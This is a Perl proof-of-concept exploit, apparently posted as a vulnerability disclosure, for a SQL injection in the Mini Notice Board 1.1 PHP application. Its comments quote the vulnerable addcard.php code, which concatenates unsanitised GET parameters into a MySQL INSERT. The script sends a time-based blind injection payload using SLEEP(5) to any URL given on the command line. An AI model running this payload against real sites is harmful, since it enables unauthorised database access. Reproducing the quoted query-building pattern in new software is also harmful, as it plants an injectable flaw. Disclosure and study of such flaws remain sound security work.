#!/usr/bin/perl -w
#mininoticeboard_v1.1 SQL Injection Exploit
#==========================================
#Discovered by N_A , N_A[at]tutanota.com
#========================================
#Vendor has been notified
#=========================
#Description
#============
#Mini Notice Board is a small noticeboard application that allows users to post notice cards online. e.g. if people want to sell their car
#or lawnmower or want to provide services, they can simply write a card.
#It supports unlimited Regions.
#https://sourceforge.net/projects/mininoticeboard/
#Vulnerability
#=============
#addcard.php:
#The variables from the GET request are fed unsanitized directly into the MYSQL database resulting in an SQL Injection
#$title = $_GET["title"];
#$body = $_GET["body"];
#$contact = $_GET["contact"];
#$address = $_GET["address"];
#$tel = $_GET["tel"];
#$date_day = date("d");
#$date_month = date("m");
#$date_year = date("y");
#$romovalcode = genremovalcode();
#$categorie = $cid;
#if($title!="" && $body!="" && $tel!="" && $contact!="")
#{
# include 'dbconnect.php';
# $sqlset["tablename"] = $sqlset["tableprefix"].'content';
# mysql_query('INSERT INTO `'.$sqlset["tablename"].'` (`title`, `content`, `contact`, `address`, `tel`, `date_day`, `date_month`, `date_year`, #`removalcode`, `categorie`) VALUES (\''.$title.'\', \''.$body.'\', \''.$contact.'\', \''.$address.'\', \''.$tel.'\', \''.$date_day.'\',
#\''$date_month.'\', \''.$date_year.'\', \''.$romovalcode.'\', \''.$categorie.'\')') or $status = 'red';
#Proof Of Concept Exploit attached below
#N_A, N_A[at]tutanota.com
use strict;
use LWP::Simple;
my ($url) = @ARGV;
if( not defined $url )
{
print "=========================================\n";
print "Mini Notice Board SQL Injection Exploit\n";
print "\tBy N_A\n";
print "\n";
print "$0 [URL]\n";
print "$0 127.0.0.1/mininoticeboard\n";
print "=========================================\n";
exit;
}
my $file = '/addcard.php'; #The Vulnerable .php file
my $injection = 'title=pentest&body=blah\' OR (SELECT * FROM (SELECT(SLEEP(5)))jAEh) AND \'OKSG\'=\'OKSG&tel=555&contact=blahblah&address=blahblah&submit=Add+Card';
my $request ="http://".$url.$file."?".$injection; #Forming the exploit string
my $content = get $request;
die "Could not get $request" unless defined $content;
#It should hang here for about 5 seconds..... (SLEEP(5)) as per injection
print "##########################\n";
print "SQL Injection Successful!\n";
print "##########################\n"